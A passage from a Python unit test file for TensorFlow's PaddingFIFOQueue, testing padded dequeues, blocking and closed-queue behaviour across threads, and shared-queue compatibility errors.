[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_up_to(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, (
(4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32),
((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
dtypes_lib.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(
([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many(
(array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
with self.assertRaises(ValueError):
q.enqueue((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
self.evaluate(dequeued_t)
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(50, dtypes_lib.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
sess.run(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = array_ops.placeholder(
dtypes_lib.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(
elements_enqueued, elements_enqueued + count, dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
sess.run(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(
elements_dequeued, elements_dequeued + count, dtype=np.int32)
self.assertAllEqual(expected_range,
dequeuemany_t.eval({
count_placeholder: count
}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.PaddingFIFOQueue(100, dtypes_lib.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.PaddingFIFOQueue(total_count, dtypes_lib.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
self.assertAllEqual(elems[3:], sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
sess.run(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(dequeued_t)
self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))
def close():
sess.run(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, (dtypes_lib.float32,
dtypes_lib.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
self.assertEqual([50.0], self.evaluate(dequeued_t))
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
time.sleep(0.01)
self.assertEqual([50.0], self.evaluate(dequeued_t))
self.assertEqual([60.0], self.evaluate(dequeued_t))
# Make sure the thread finishes before exiting.
thread.join()
def testBlockingEnqueueBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(1, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_2 = data_flow_ops.PaddingFIFOQueue(
15, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_b")
q_b_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_c")
q_c_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_f")
q_f_2 = data_flow_ops.PaddingFIFOQueue(
